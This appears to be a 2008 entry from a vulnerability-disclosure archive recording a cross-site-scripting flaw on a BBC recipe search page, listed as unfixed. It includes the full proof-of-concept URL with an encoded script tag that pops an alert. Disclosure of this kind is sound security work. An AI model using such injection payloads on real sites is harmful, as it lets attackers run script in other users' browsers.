Security researcher SaMTHG, has submitted on 12/10/2008 a cross-site-scripting (XSS) vulnerability affecting www.bbc.co.uk, which at the time of submission ranked 46 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 05/11/2008. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 12/10/2008 |
Date published: 05/11/2008 |
Fixed? Mail us! | Status: UNFIXED |
Author: SaMTHG |
Domain: www.bbc.co.uk |
Category: XSS |
Pagerank: 46 |
URL: http://www.bbc.co.uk/apps/ifl/food/recipes/queryengine?templatestyle=refine_by_1_gg&orig_kw=%22%3E%3 Cscript%3Ealert(%22XSS%22)%3C/script%3E&config=db&scope=recipes&page=1&pagesize=15&attrib_26=keyword s&oper_26=eq&val_26_1=%22%3E%3C&attrib_2=programme_name&oper_2=eq&val_2_1=Saturday+Kitchen&attrib_3= chef_name&oper_3=eq&val_3_1=&attrib_12=healthy&oper_12=eq&attrib_13=quick&oper_13=eq&attrib_10=veget arian&oper_10=eq&submit.x=0&submit.y=0&submit=Search |
Click here to view the mirror
|
|
|